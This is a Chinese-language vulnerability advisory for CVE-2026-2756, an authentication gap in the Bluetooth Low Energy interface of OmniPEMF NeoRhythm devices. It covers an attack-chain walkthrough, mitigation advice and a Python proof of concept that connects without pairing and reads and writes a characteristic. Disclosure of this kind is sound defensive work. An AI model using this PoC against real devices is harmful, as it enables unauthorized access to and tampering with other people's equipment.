CVE-2026-2756 CVSS 5.0 中危

CVE-2026-2756 OmniPEMF NeoRhythm认证缺失漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2756

漏洞类型

认证缺失

CVSS评分

5.0 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OmniPEMF NeoRhythm

漏洞概述

OmniPEMF NeoRhythm设备（版本20260308及之前）的BLE接口组件存在安全漏洞。由于对未知功能的身份验证缺失，攻击者可在本地网络内无需认证即可发起攻击。尽管利用复杂度较高，但成功攻击可能泄露设备信息或篡改配置。

技术细节

该漏洞源于OmniPEMF NeoRhythm设备的蓝牙低功耗（BLE）接口在处理特定功能请求时未实施身份验证机制。攻击者需处于设备的无线信号覆盖范围内（邻接攻击）。由于攻击复杂度高，利用者需具备针对BLE协议的逆向能力。通过向特定特征值发送特制数据包，攻击者可绕过认证逻辑，执行未授权操作，导致设备的机密性、完整性或可用性受损。

攻击链分析

STEP 1

扫描与发现

攻击者在本地范围内扫描BLE设备，识别目标OmniPEMF NeoRhythm设备的MAC地址。

STEP 2

建立连接

利用漏洞特性，攻击者在无需提供任何凭据或配对的情况下，直接连接到设备的BLE接口。

STEP 3

发送恶意指令

通过逆向分析得到的UUID，向存在认证缺失的特征值发送特制的BLE数据包。

STEP 4

执行未授权操作

设备接收并执行指令，导致数据泄露、配置被修改或设备功能异常。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import asyncio
from bleak import BleakClient

# Replace with the actual MAC address of the target device
TARGET_ADDRESS = "XX:XX:XX:XX:XX:XX"
# Replace with the vulnerable Characteristic UUID
CHAR_UUID = "0000ffe1-0000-1000-8000-00805f9b34fb"

async def main():
    print(f"[*] Attempting to connect to {TARGET_ADDRESS}...")
    try:
        # Connect to the device without authentication
        async with BleakClient(TARGET_ADDRESS) as client:
            if client.is_connected:
                print("[+] Connected successfully! Authentication bypassed.")
                
                # Example interaction: Writing data to the vulnerable characteristic
                payload = b"\x01\x02\x03\x04"
                await client.write_gatt_char(CHAR_UUID, payload)
                print(f"[+] Payload sent to {CHAR_UUID}")
                
                # Example interaction: Reading sensitive data
                data = await client.read_gatt_char(CHAR_UUID)
                print(f"[+] Data read: {data}")
    except Exception as e:
        print(f"[-] Exploit failed: {e}")

if __name__ == "__main__":
    asyncio.run(main())

影响范围

OmniPEMF NeoRhythm <= 20260308

防御指南

临时缓解措施

鉴于厂商尚未发布补丁，建议用户在安全可控的本地网络环境中使用该设备，并尽量减少蓝牙开启时间。如果设备支持，可禁用BLE服务以完全阻断攻击路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-2756
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-2756
3 Details https://www.cvedetails.com/cve/CVE-2026-2756/
4 VulDB https://vuldb.com/cve/CVE-2026-2756
5 Link https://ab3j.radio/NeoRhythm.pdf
6 Link https://vuldb.com/?ctiid.352383
7 Link https://vuldb.com/?id.352383
8 Link https://vuldb.com/?submit.774937

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表